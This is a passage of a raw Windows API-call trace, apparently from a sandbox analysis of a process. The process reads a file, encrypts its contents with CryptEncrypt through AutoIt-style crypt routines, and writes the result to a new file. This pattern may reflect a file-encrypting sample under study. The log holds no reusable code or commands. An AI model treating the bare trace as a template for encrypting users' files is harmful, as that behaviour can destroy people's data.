lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0079.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0079.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0079.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0079.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0079.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0079.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0079.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0079.610] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0079.611] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0079.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0079.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0079.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0079.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0079.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0079.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0079.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0079.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0079.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e04020 [0079.614] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0079.614] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0xadcc, lpOverlapped=0x0) returned 1 [0079.615] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0079.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0079.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xadcc) returned 0x499a008 [0079.618] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0079.618] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0079.618] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0079.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0079.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0079.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0079.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0079.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0079.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0079.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0079.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0079.618] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.618] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0079.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0079.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0079.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0079.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0079.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796fc8 [0079.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0079.619] CryptGetKeyParam (in: hKey=0x41ac280, dwParam=0x7, pbData=0x43e28f0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e28f0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0079.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0079.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eada8 [0079.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0079.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0079.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0079.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0079.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0079.619] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.619] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.619] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.619] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.619] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0079.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0079.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0079.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0079.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cafd0 [0079.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cafd0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0079.619] CryptEncrypt (in: hKey=0x41ac280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0xadcc, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0xadd0) returned 1 [0079.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0079.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9a40 [0079.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0079.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0079.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0079.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0079.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0079.620] CharLowerBuffW (in: lpsz="byte[44497]", cchLength=0xb | out: lpsz="byte[44497]") returned 0xb [0079.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0079.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0079.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0079.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0079.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0079.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0079.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0079.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0079.620] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.620] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0079.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0079.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0079.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0079.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cb138 [0079.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb138, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0079.621] CryptEncrypt (in: hKey=0x41ac280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49ba990*, pdwDataLen=0x144e538*=0xadcc, dwBufLen=0xadd0 | out: pbData=0x49ba990*, pdwDataLen=0x144e538*=0xadd0) returned 1 [0079.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0079.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0079.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0079.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0079.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0079.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0079.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0079.621] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.621] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.621] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.621] WriteFile (in: hFile=0x298, lpBuffer=0x499a008*, nNumberOfBytesToWrite=0xadd0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x499a008*, lpNumberOfBytesWritten=0x144ef3c*=0xadd0, lpOverlapped=0x0) returned 1 [0079.623] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0079.623] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.623] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0079.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0079.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0079.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0079.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cac70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0079.623] CryptDestroyKey (hKey=0x41ac280) returned 1 [0079.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0079.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0079.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0079.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0079.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0079.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.624] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.624] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.624] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0079.624] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.624] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0079.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0079.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0079.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0079.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0079.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0079.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0079.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0079.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0079.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0079.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0079.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0079.625] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0079.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0079.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.684] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0079.690] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0079.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0079.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0079.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0079.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0079.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0079.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0079.690] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0079.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0079.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0079.690] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0079.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0079.691] HeapFree (in: hHeap=0x1780000, 